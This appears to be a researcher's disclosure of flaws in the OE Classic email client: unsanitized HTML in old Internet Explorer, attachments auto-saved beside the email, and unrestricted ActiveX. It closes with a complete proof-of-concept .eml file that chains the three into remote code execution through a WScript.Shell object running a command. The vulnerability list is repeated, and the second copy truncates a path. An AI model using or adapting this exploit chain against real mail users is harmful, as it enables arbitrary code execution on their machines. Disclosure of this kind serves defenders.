OE Classic - Popular desktop email client based on old Internet Explorer.
I think it's just luck that I can find that XSS and turn it to RCE because technicues that i use is very old, and i doesnt research it in past.
Vulnerability #1
Type: Cross Site Scripting
Severity: high (because used origin file:// and attacker can read files via javascript/vbscript)
Description: Application use IE for render HTML and havent good sanitization.
Example:
Vulnerability #2
Type: Autodownloading attachments and email in same directory
Severity: high (because attacker can run any file via relative path)
Description: when victim user read email, content of it and all attachments downloads to this folder: C:\Users\%UserName% \AppData\Local\OEClassic\Prg\T\1-%number% \
Vulnerability #3
Type: Old IE for rendering without ActiveX security restrictions
Severity: high (because attacker can use arbitrary ActiveX object)
Description: Old IE can use arbitrary ActiveX object. This functionality leads to RCE (Examples: https://www.exploit-db.com/exploits/11229, http://www.guninski.com/wmp-desc.html)
Vulnerability #1
Type: Cross Site Scripting
Severity: high (because used origin file:// and attacker can read files via javascript/vbscript)
Description: Application use IE for render HTML and havent good sanitization.
Example:
<BODY BACKGROUND="javascript:document.body.innerHTML='<textarea id=x>prompt(1,location);</textarea><button onclick=eval(document.getElementById(\'x\').innerHTML)>run</button>';">body</BODY>
Vulnerability #2
Type: Autodownloading attachments and email in same directory
Severity: high (because attacker can run any file via relative path)
Description: when victim user read email, content of it and all attachments downloads to this folder: C:\Users\
Vulnerability #3
Type: Old IE for rendering without ActiveX security restrictions
Severity: high (because attacker can use arbitrary ActiveX object)
Description: Old IE can use arbitrary ActiveX object. This functionality leads to RCE (Examples: https://www.exploit-db.com/exploits/11229, http://www.guninski.com/wmp-desc.html)
Full proof of concept (.eml file):
Subject: calc
From: test@gmail.com
To: test@yahoo.com
Content-Type: multipart/alternative; boundary=bcaec520ea5d6918e204a8cea3b4
--bcaec520ea5d6918e204a8cea3b4
Content-Type: text/html; charset=UTF-8;
Content-Transfer-Encoding: 7bit
<BODY BACKGROUND='javascript:document.body.innerHTML="\x3ciframe style=display:none src=./test.html name=test\x3e\x3c/iframe\x3e"'>BACKGROUND</BODY>
--bcaec520ea5d6918e204a8cea3b4
Content-Type: message/rfc822; charset=UTF-8; name="test.h\tml"
Content-Transfer-Encoding: 7bit
<html>
<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmd.exe /k calc");
</script>
</html>
--bcaec520ea5d6918e204a8cea3b4